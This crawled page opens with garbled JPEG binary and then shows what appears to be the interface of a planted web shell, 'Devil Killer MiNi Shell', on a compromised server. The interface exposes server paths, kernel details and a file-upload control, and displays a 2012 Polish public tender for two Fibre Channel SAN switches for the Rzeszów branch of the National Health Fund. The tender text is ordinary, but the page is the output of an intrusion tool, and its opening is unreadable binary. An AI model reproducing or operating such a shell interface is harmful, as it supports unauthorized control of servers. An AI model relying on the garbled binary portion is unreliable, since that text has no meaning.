JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121109/442468-N-2012.html

<p class="kh_header"><b>Rzeszów: Dostawa dwóch przełączników FC wraz z instalacją i konfiguracją dla Narodowego Funduszu Zdrowia Podkarpackiego Oddziału Wojewódzkiego 
z siedzibą w Rzeszowie</b><br>
<b>Numer ogłoszenia: 442468 - 2012; data zamieszczenia: 09.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpacki Oddział Wojewódzki Narodowego Funduszu Zdrowia , ul. Zamkowa 8, 35-032 Rzeszów, woj. podkarpackie, tel. 017 8604212, 8604246.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nfz-rzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa dwóch przełączników FC wraz z instalacją i konfiguracją dla Narodowego Funduszu Zdrowia Podkarpackiego Oddziału Wojewódzkiego 
z siedzibą w Rzeszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia

I. Dostawa dwóch przełączników FC 
Zamawiający zamierza przeprowadzić modernizację środowiska sieci SAN. Obecne środowisko składa się z czterech przełączników:
1. HP StorageWorks 4 32 SAN Switch - 2 sztuki 
2. HP StorageWorks 8 40 SAN Switch - 2 sztuki
W ramach modernizacji środowiska Zamawiający wymaga dostawy wraz z instalacją i konfiguracją dwóch przełączników FC, każdy o następujących parametrach:
	Przełącznik FC 8Gb s full-duplex
	Min aktywne 32-porty FC, w architekturze non-blocking z możliwością rozbudowy do co najmniej 38 portów.
	Każdy port może działać z maksymalną przepustowością 8Gb s (brak wewnętrznego podziału pasma pomiędzy kilka portów),
	Zsumowana przepustowość przełącznika FC musi wynosić minimum 640 Gb s end-to-end full duplex.
	Port może działać w następujących trybach: FL_Port, F_Port, E_Port; U_Port,
	Możliwość agregacji połączeń pomiędzy przełącznikami (trunking) z posiadanymi przez Zamawiającego przełącznikami na poziomie poszczególnych ramek. Wymagana możliwość utworzenia połączenia  trunk o przepustowości minimum 64 Gb s. 
	Wymagane funkcjonalności:
	Agregacja pojedynczych połączeń ISL, w jedno logiczne połączenie, 
	Monitoring ruchu i aktywne zarządzanie utylizacją zasobów przełączników FC,
	Monitoring zdarzeń w sieci SAN,
	Możliwość łączenie sieci SAN na dużych odległościach,
	Definiowanie tzw. stref (ang. Zoning),
	Zarządzanie przez przeglądarkę oraz poprzez Telnet,
           Wsparcie dla protokołu SNMP,
	Instalacja w szafie rack 19-cali,
	Redundantne zasilacze i wentylatory,
	Min. 32 wkładki FC SFP shortwave,
	Min. 20 kabli FC LC-SC OM3 o długości min. 2m
	Min. 20 kabli FC LC-LC OM3 o długości min. 1m
	Min. 20 kabli FC LC-LC OM3 o długości min. 15m
	Min. 5 kabli FC SC-LC OM3 o długości min. 15m
Zamawiający dopuszcza składanie ofert dotyczących rozwiązań równoważnych tzn. wyprodukowanych przez innych producentów niż wymienieni lub ich uprawnionych przedstawicieli. Użyte w specyfikacji określenia wskazujące znaki towarowe, patenty lub pochodzenie przedmiotu zamówienia należy odczytywać wraz z wyrazami  lub równoważne. Wykonawca oferując przedmiot równoważny do opisywanego w specyfikacji jest zobowiązany zachować równoważność w zakresie parametrów użytkowych, funkcjonalnych i jakościowych, które musza być na poziomie nie niższym od parametrów wskazanych przez Zamawiającego.
II. Prace instalacyjno-wdrożeniowe
W ramach usługi Wykonawca ma zrekonfigurować sieć SAN dodając do konfiguracji dwa nowo zakupione przełączniki FC. 
1.	Inwentaryzacja stanu obecnego
a)	Zestawienie aktualnie stosowanej nomenklatury
b)	Rysunki połączeń logicznych istniejących urządzeń
c)	Zestawienie nazewnictwa poszczególnych istniejących urządzeń, stref (o ile ma to zastosowanie)
d)	Definicje poszczególnych stref (o ile ma to zastosowanie)
e)	Rysunki połączeń fizycznych ze wskazaniem odpowiednich portów w odpowiednich urządzeniach
f)	Tabelaryczne zestawienie oznaczeń połączeń fizycznych
g)	Tabelaryczne zestawienie połączeń ze wskazaniem identyfikatorów WWN odpowiednich portów
h)	Tabelaryczne zestawienie parametrów konfiguracyjnych stosowanych przełączników
i)	Zestawienie wersji oprogramowania wbudowanego przełączników FC
j)	Zestawienie oznaczeń połączeń fizycznych

2.	Przygotowanie projektu technicznego 
a)	Zestawienie stosowanej nomenklatury
b)	Rysunki połączeń logicznych objętych urządzeń z uwzględnieniem istniejących urządzeń i zaznaczeniem koniecznych zmian przepięć
c)	Propozycję nazewnictwa poszczególnych urządzeń, stref (o ile ma to zastosowanie)
d)	Definicje poszczególnych stref (o ile ma to zastosowanie)
e)	Rysunki połączeń fizycznych ze wskazaniem odpowiednich portów w odpowiednich urządzeniach (z uwzględnieniem istniejących połączeń) i z oznaczeniem koniecznych zmian przepięć
f)	Propozycję oznaczeń połączeń fizycznych
g)	Zestawienie wymagań odnośnie wersji oprogramowania wbudowanego przełączników FC
h)	Zestawienie wymagań odnośnie konfiguracji urządzeń podłączanych do sieci SAN
i)	Propozycję testów odbiorczych funkcjonalnych - weryfikacja dostępności odpowiednich zasobów prezentowanych w sieci SAN

3.	Przygotowanie projektu implementacyjnego - harmonogramu prac
a)	Zestawienie etapów implementacji ze wskazaniem szacowanego czasu trwania
b)	Zestawienie koniecznych wyłączeń urządzeń ze wskazaniem szacowanego czasu trwania
c)	Zestawienie koniecznych zmian w istniejących połączeniach (o ile ma to zastosowanie)

4.	Implementacja zgodna z przyjętym projektem - harmonogramem

5.	Przeprowadzenie testów odbiorczych
a)	Weryfikację zgodności konfiguracji poszczególnych urządzeń z projektem technicznym
b)	Weryfikację zgodności połączeń fizycznych z projektem technicznym
c)	Weryfikację zgodności przyjętych oznaczeń połączeń fizycznych z projektem technicznym
d)	Wykonanie testów odbiorczych funkcjonalnych 

6.	Przygotowanie dokumentacji powykonawczej
a)	Zestawienie stosowanej nomenklatury
b)	Rysunki połączeń logicznych objętych urządzeń
c)	Tabelaryczne zestawienie nazewnictwa poszczególnych urządzeń, stref 
d)	Definicje poszczególnych stref (o ile ma to zastosowanie)
e)	Rysunki połączeń fizycznych ze wskazaniem odpowiednich portów w odpowiednich urządzeniach
f)	Tabelaryczne zestawienie oznaczeń połączeń fizycznych
g)	Tabelaryczne zestawienie połączeń ze wskazaniem identyfikatorów WWN odpowiednich portów
h)	Tabelaryczne zestawienie parametrów konfiguracyjnych stosowanych przełączników
i)	Zestawienie wersji oprogramowania wbudowanego przełączników FC
j)	Zestawienie wymagań odnośnie konfiguracji urządzeń podłączanych do sieci SAN

III. Gwarancja i wsparcie

Zamawiający wymaga, aby oferowana rozbudowa środowiska SAN była objęta gwarancją co najmniej przez okres 1 roku. W ramach gwarancji wsparcie serwisowe będzie realizowane w następującym trybie:
	Wsparcie obejmuje;
	Sprzęt
	Oprogramowanie wbudowane i oprogramowanie narzędziowe zainstalowane na sprzęcie lub niezbędne do jego poprawnego funkcjonowania
	Okno czasowe zgłaszania incydentów dotyczących sprzętu - 24 godziny na dobę, przez 7 dni w tygodniu,
	Obsługa zgłoszeń w języku polskim;
	Czas reakcji na incydenty dotyczące sprzętu - do 4 godzin,
	Gwarantowany czas naprawy sprzętu: 24 godziny od momentu zgłoszenia, 
	Jeżeli usunięcie awarii sprzętu wymaga wymiany nośnika danych (dysk twardy) Zamawiający wymaga pozostawienia uszkodzonego nośnika;
	Okno czasowe zgłaszania incydentów dotyczących oprogramowania - 24 godziny na dobę, przez 7 dni w tygodniu,
	Czas reakcji na incydenty dotyczące oprogramowania - do 2 godzin
	Powołanie opiekuna po stronie Wykonawcy, którego zadaniem będzie koordynacja prac świadczonych na rzecz Zamawiającego 
	Dostęp do poprawek i nowych wersji oprogramowania objętego kontraktem serwisowym 
	Dostęp wyznaczonych osób Zamawiającego do baz wiedzy, zarówno producenta sprzętu, jak i oprogramowania,
	Utrzymywanie dokumentu (plan obsługi serwisowej) zawierającego:
	Opis systemu objętego serwisem
	Specyfikację zobowiązań serwisowych
	Harmonogram planowanych prac serwisowych
	Listę zgłoszeń serwisowych 
	2 razy w każdym kolejnym roku obowiązywania gwarancji planowanie prac serwisowych obejmujące:
	Analizę zgłoszeń serwisowych
	Planowanie prac serwisowych
	Przedstawienie uaktualnionego planu obsługi serwisowej
	2 razy w każdym kolejnym roku obowiązywania gwarancji dostarczanie pisemnych rekomendacji odnośnie instalacji nowych wersji oprogramowania wbudowanego (mikrokody) i sterowników urządzeń (device driver);
	2 razy w każdym kolejnym roku obowiązywania gwarancji dostarczanie pisemnych rekomendacji odnośnie instalacji poprawek do oprogramowania objętego serwisem
	2 razy w każdym kolejnym roku obowiązywania gwarancji przegląd techniczny urządzenia obejmujący:
           Weryfikację poprawności funkcjonowania sprzętu;
	Instalację rekomendowanych nowych wersji mikrokodów i sterowników urządzeń;
	Instalację rekomendowanych poprawek do systemu operacyjnego i oprogramowania narzędziowego



IV. Wymagania obligatoryjne
1.	Wykonawca zobowiązany jest do zainstalowania niezbędnych łat czy poprawek programowych, podniesienia wersji oprogramowania do jej najwyższej stabilnej wersji dla urządzeń objętych strukturą SAN - jeżeli będzie to wymagane podczas procesu instalacji nowych przełączników.
2.	W przypadku awarii dysku twardego w jakimkolwiek modernizowanym lub dostarczanym  urządzeniu, uszkodzony dysk pozostaje u Zamawiającego.
3.	Przed każdą realizacją modernizacji infrastruktury IT Wykonawca musi uzyskać zatwierdzenia projektu tej modernizacji przez Zamawiającego.
4.	Zamawiający wymaga przedstawienia do zatwierdzenia przez Zamawiającego szczegółowego harmonogramu prac z tym zastrzeżeniem, że prace dotyczące modernizacji środowiska IT nie  mogą spowodować zakłóceń lub przestojów w pracy POW NFZ. Zamawiający wymaga, aby    wszelkie prace modernizacyjne powodujące niedostępność środowiska przetwarzania danych  prowadzone były poza godzinami pracy Zamawiającego, tzn. by nie były prowadzone w godzinach od 7:00 do 16:30.
5.	Wszystkie zakupione urządzenia muszą pochodzić z legalnego źródła, zakupione 
w autoryzowanym kanale sprzedaży producenta w Polsce.
6.	Zamawiający zastrzega sobie prawo do żądania potwierdzenia źródła pochodzenia urządzenia 
w postaci oświadczenia producenta.
7.	Zamawiający wymaga, aby Wykonawca w ramach realizacji przedmiotu Umowy zamontował 
i uruchomił dostarczone przez siebie urządzenia w szafach wskazanych przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.42.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający żąda od Wykonawców wniesienia wadium w wysokości : 9 000,00 zł.  ( słownie: dziewięć tysięcy złotych i 00/100 ) przed  upływem terminu składania  ofert.
2. Wadium może być wnoszone w jednej lub kilku następnych formach:
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielonych  przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007 r. Nr 42, poz.275, z 2008 r. Nr 116, z późń. zm. ).
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Narodowego Funduszu Zdrowia Podkarpackiego Oddziału Wojewódzkiego z siedzibą w Rzeszowie nr BGK 
       o Rzeszów 36 1130 1105 0005 2010 9520 0003,  przed upływem terminu składania ofert tak, aby przed upływem tego terminu wadium znajdowało się na w/w  rachunku.
4. Oryginał dokumentu stanowiącego wadium, należy złożyć w Wydziale Administracyjno- Gospodarczym POW NFZ w Rzeszowie, ul Zamkowa 8, pokój 223, a kopię należy dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
-  spełniają warunki,  zgodnie z art. 22 ust.1 ustawy Prawo Zamówień Publicznych dotyczące:                                                   
1.1.	 posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
1.2.	posiadania wiedzy i doświadczenia; 
1.3.	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
1.4.	sytuacji ekonomicznej i finansowej.
            - nie podlegają wykluczeniu na podstawie art. 24 ust. 1 ustawy Prawo Zamówień      Publicznych;
Ocena spełnienia ww warunków, będzie odbywała się na podstawie kompletu dokumentów określonych niżej, wg  kryterium  spełnia nie spełnia. 
2.   W celu potwierdzenia spełnienia opisanych w pkt 1 warunków, wykonawca zobowiązany jest do  złożenia wraz z ofertą niżej wymienionych dokumentów i oświadczeń:
2.1.	Oświadczenie o spełnieniu warunków udziału w postępowaniu - według wzoru: 
Załącznik nr 3 do SIWZ;
2.2.	Oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 Ustawy Prawo Zamówień Publicznych - według wzoru - Załącznik Nr 4 do SIWZ;
2.3.	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wypisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy - według wzoru - Załącznik Nr 5.
2.4.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
2.5.	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
2.6.	Wykaz wykonanych dostaw oraz usług w okresie ostatnich trzech lat przed  dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie- wymagane jest, aby Wykonawca wykazał, iż w ciągu podanego okresu zrealizował co najmniej dwa zamówienia o wartości co najmniej 300 000,00 zł każde a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  przynajmniej jednej wykonanej dostawy o wartości co najmniej  300 000,00 zł. - w tym zakresie - Załącznik nr 8 do SIWZ
2.7.	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane ( Dz. U. z 2009 r. Nr 226 poz. 1817 ).
3.   Oferta składana przez dwa lub kilka podmiotów, które występują wspólnie ( tzw. konsorcja )
       musi spełniać następujące wymagania:
           3.1 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić      Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego a takie pełnomocnictwo musi być podpisane przez osoby upoważnione. 
3.2	 Każdy z wykonawców musi oświadczyć, że nie podlega wykluczeniu na podstawie art.            24 ust.   1 ustawy składając swój podpis na oświadczeniu wskazanym w pkt 2.2 SIWZ      ( ewentualnie również w pkt 2.3. SIWZ) Warunki określone w pkt 1.1.- 1.4. SIWZ Wykonawcy występujący wspólnie muszą spełniać łącznie.
4.	Oferta składana przez wspólników spółki cywilnej musi zawierać ponadto umowę spółki.
5.	W przypadku, gdy wykonawca zapowiada zatrudnienie podwykonawców do oferty musi być załączony  wykaz z zakresem powierzonych im zadań (części zamówienia),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.6.	Wykaz wykonanych dostaw oraz usług w okresie ostatnich trzech lat przed  dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie- wymagane jest, aby Wykonawca wykazał, iż w ciągu podanego okresu zrealizował co najmniej dwa zamówienia o wartości co najmniej 300 000,00 zł każde a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  przynajmniej jednej wykonanej dostawy o wartości co najmniej  300 000,00 zł. - w tym zakresie - Załącznik nr 8 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

